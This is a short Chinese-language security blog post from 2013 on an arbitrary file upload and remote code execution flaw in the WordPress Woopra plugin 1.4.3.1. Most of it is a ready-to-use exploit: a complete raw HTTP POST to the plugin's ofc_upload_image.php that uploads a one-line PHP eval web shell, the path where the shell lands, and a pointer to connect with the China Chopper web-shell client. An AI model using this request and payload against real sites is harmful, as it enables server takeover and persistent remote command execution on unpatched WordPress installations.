又是WordPress插件惹的祸:Woopra插件任意文件上传+远程代码执行

2013-10-24    分类: php注入,网络安全

WordPress的功能强大之一也就是它的插件多,开发者们为了方便自己也方便那些不懂代码的新手来说安装插件无疑是最简单直接的方法。

但是开发者在开放插件的同时往往只考虑功能是否能够实现其功能,几乎不考虑安全性问题,也正因为插件是开源的原始代码也很容易获取到对于那些别有用心的黑客来说,安装了那些安全性不高的插件基本就是帮助黑客安装了一道后门。

Woopra插件就是其中之一。

照例e文装逼

WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/index.php/wordpress-woopra-remote-code-execution/

 

此漏洞对Woopra 1.4.3.1以上版本无效。

插件下载地址:

http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip

 

exp发包:

POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
Host: ha.cker.in
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 28

<?php eval($_POST['cmd']); ?>

 

上传的文件在http://ha.cker.in/wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/tmp-upload-images/11.php

菜刀连接就ok了。